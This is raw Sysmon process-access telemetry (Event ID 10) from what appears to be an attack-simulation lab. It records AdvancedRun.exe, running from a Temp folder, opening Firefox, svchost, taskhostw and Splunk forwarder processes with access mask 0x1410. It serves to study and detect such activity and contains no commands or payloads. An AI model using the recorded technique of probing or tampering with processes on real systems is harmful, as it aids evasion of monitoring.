Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968314Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.723{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9960-000000002402}7400C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.722{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AD-61E9-9860-000000002402}5388C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968307Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.722{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AC-61E9-9660-000000002402}3000C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968306Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.722{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9560-000000002402}32C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968305Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.722{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9460-000000002402}688C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968304Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.722{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9360-000000002402}6316C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968303Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.722{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A8-61E9-9260-000000002402}5876C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968302Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.721{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A8-61E9-9160-000000002402}4996C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968301Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.721{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A7-61E9-9060-000000002402}4208C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968300Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.721{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A6-61E9-8E60-000000002402}6208C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968299Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.721{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-C0D6-61E9-A75B-000000002402}6364C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968298Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.720{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-C0D6-61E9-A65B-000000002402}5500C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968297Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.720{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-BF7F-61E9-6C5B-000000002402}4172C:\Windows\system32\ApplicationFrameHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968296Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.720{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-B545-61E9-205A-000000002402}5824C:\Windows\system32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968295Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.720{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B9E-61E7-8306-000000002402}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.719{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B98-61E7-7A06-000000002402}6584C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 